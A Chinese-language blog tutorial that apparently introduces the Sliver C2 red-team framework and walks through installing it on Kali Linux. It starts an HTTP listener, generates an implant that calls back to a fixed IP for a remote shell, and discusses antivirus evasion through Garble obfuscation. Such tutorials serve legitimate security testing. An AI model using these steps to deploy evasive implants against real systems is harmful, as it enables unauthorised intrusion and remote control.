在之前的文章中,我们提到了许多常见的渗透框架,如Empire、Cobalt Strike、Msfconsole等等。尽管它们各有优点,但它们共同的缺点之一就是免杀能力有限。那么,有没有一款工具既能实现团队协作,又能做到高效的免杀呢?
Sliver C2 是一款基于Go语言开发的开源、跨平台的红队平台,为各种规模的组织提供执行安全测试的功能。Sliver 支持使用 Mutual-TLS、HTTP(S) 和 DNS 等协议进行 C2 连接。其 implant 可以实时编译生成,并且使用证书进行加密传输。无论是服务器端、客户端还是 implant,都支持 MacOS、Windows 和 Linux 系统。
现在,让我们来看看如何在 Kali Linux 服务器上安装 BishopFox 的 Sliver C2 框架。
在 Kali 中安装
您可以通过源码安装 Sliver,但可能由于网络等因素导致下载速度较慢。在这种情况下,您可以直接访问 Sliver 的 GitHub Releases 页面,下载预编译的 Linux 服务器端版本。
运行
在 Kali Linux 中,运行 Sliver 非常简单。由于 Kali 已经内置了必要的环境变量(如 go、gcc),您只需执行以下命令即可启动 Sliver 服务器:
sliver-server_linux
快速上手
配置一个基于 HTTP 的监听:
http -l 8888
生成一个基于 HTTP 的 C2 shell:
generate --http http://192.168.123.23:8888
免杀测试
Sliver 使用了 Garble 进行代码混淆,使生成的木马文件免杀效果更好。您可以通过本地杀毒软件进行测试,但需要注意,某些云查杀服务(如 360 云查杀)可能会检测到该木马。在后续文章中,我们将进一步讨论云查杀的问题。
其他
Sliver 还有许多其他用法,我们将在后续文章中继续更新。感兴趣的读者可以点赞收藏,以便及时获取最新内容。
暂无评论内容